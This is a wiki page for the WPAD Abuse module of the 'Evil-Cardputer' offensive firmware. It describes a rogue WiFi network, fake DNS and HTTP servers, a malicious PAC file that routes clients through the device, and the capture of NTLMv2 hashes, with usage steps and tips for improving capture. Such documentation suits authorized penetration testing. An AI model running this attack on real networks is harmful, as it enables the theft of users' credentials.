-
Notifications
You must be signed in to change notification settings - Fork 222
wpad abuse
7h30th3r0n3 edited this page Sep 7, 2025
·
6 revisions
The WPAD Abuse module exploits the Web Proxy Auto-Discovery Protocol (WPAD) to capture NTLMv2 authentication hashes.
When a device tries to auto-discover a proxy (via wpad.dat), the Cardputer answers with a
malicious proxy configuration. If the device authenticates, the hash is intercepted and stored.
- 🛜 Starts a wifi network
- 📡 Starts a fake DNS server (port 53)
- 🌐 Runs a HTTP server (port 80)
- 📝 Serves
wpad.dat(PAC file) - 🔐 Captures NTLMv2 hashes when clients attempt authentication
| Path | Purpose |
|---|---|
(firmware) wpad.dat
|
PAC served directly from hardcoded value |
/evil/NTLM/ntlm_hashes.txt |
Captured NTLMv2 hashes (Hashcat-style lines) |
function FindProxyForURL(url, host) {
return "PROXY 192.168.4.1:80; DIRECT";
}
- Boot your Evil-Cardputer
- Select WPAD Abuse from the main menu
- A WiFi is started waiting for client
- Wait for a connected clients to request
wpad.dat - Captured NTLMv2 hashes are saved automatically to SD
- Press BACKSPACE to exit and return to the menu
💡 Tip: Combine with Rogue DHCP AP to increase capture chances by sending a 252 option trough DHCP.
- ✅ NTLMv2 counter increases when new hash is captured
- 👤 Last user/domain/client displayed
- 📡 Radar-style animation while waiting
- 🔙 Press BACKSPACE to stop
- Use the menu Clean NTLMv2 duplicate to remove duplicates
- Or manually clear
/evil/ntlm_hashes.txt
- Works best in AP mode with DNS hijack
- Most effective on Windows with auto proxy enabled
- Some applications can trigger the NTLMv2 authentification (Teams/Outlook/TeamViewer/etc)
⚠️ Some clients (e.g., Firefox) ignore WPAD by default⚠️ If the client never used NTLMv2 before, it should send a NTLMv2 without user which is uncrackable, these are filtered
This module is strictly for authorized penetration testing, research, and educational purposes.
Unauthorized use may break the law.
- IETF Draft – WPAD (Section 4.4.1)
- Microsoft Open Specifications – MS-GRVHENC
- Microsoft – WPAD Autodiscovery
- Wikipedia – WPAD
- Installation
- Slave
- ESP32 RIG Tutorial
- Scan WiFi
- Select WiFi
- Clone & Details
- Captive Portal Management
- Admin WebUI
- Check Credential
- Probes Attack
- Sniffing Probes
- Karma Attack
- Automated Karma Attack
- Karma Spear
- Bluetooth Serial Control
- Wardriving
- Wardriving Master
- Beacon Spam
- Deauther
- Auto Deauther
- Evil Twin
- Handshake Master
- WiFi Raw Sniffing
- Sniff Raw Client
- WiFi Channel Visualizer
- Client Sniff And Deauth
- Handshakes/Deauth sniffing
- Wall Of Flipper
- Send Tesla Code with RFunit
- SSH Shell
- Scan Network and Port
- Full Network Scan
- Web Crawler
- PwnGridSpam
- Skimmer Detector
- Mouse Jiggler
- BadUSB
- Bluetooth Keyboard
- Reverse TCP Tunnel
- DHCP Starvation Attack
- Rogue DHCP Server
- Switch DNS
- Network Hijacking
- Printer Attack
- Web Siphoning Cookie
- Honeypot
- LLM Chat Stream
- EvilChatMesh
- Responder
- WPAD Abuse
- Crack NTLMv2
- FileManager
- UART Shell
- SIP toolkit
- CCTV toolkit
- SSDP poisoning
- SkyJack
- Wifi Dead Drop
- BLENameFlood
- Wall Of Airtag
- FindMyEvil
- UPnP Mapping
- UPnP NAT
- LDAPDump
- IMSI Catcher
- Open Wifi Checker
- CIW ZeroClick
- Settings
- Installation
- Slave
- ESP32 RIG Tutorial
- Scan WiFi
- Select WiFi
- Clone & Details
- Captive Portal Management
- Admin WebUI
- Check Credential
- Probes Attack
- Sniffing Probes
- Karma Attack
- Automated Karma Attack
- Karma Spear
- Bluetooth Serial Control
- Wardriving
- Wardriving Master
- Beacon Spam
- Deauther
- Auto Deauther
- Evil Twin
- Handshake Master
- WiFi Raw Sniffing
- Sniff Raw Client
- WiFi Channel Visualizer
- Client Sniff And Deauth
- Handshakes/Deauth sniffing
- Wall Of Flipper
- Send Tesla Code with RFunit
- SSH Shell
- Scan Network and Port
- Full Network Scan
- Web Crawler
- PwnGridSpam
- Skimmer Detector
- Mouse Jiggler
- BadUSB
- Bluetooth Keyboard
- Reverse TCP Tunnel
- DHCP Starvation Attack
- Rogue DHCP Server
- Switch DNS
- Network Hijacking
- Printer Attack
- Web Siphoning Cookie
- Honeypot
- LLM Chat Stream
- EvilChatMesh
- Responder
- WPAD Abuse
- Crack NTLMv2
- FileManager
- UART Shell
- SIP toolkit
- CCTV toolkit
- SSDP poisoning
- SkyJack
- Wifi Dead Drop
- BLENameFlood
- Wall Of Airtag
- FindMyEvil
- UPnP Mapping
- UPnP NAT
- LDAPDump
- IMSI Catcher
- Open Wifi Checker
- CIW ZeroClick
- TagTinker ESL
- Settings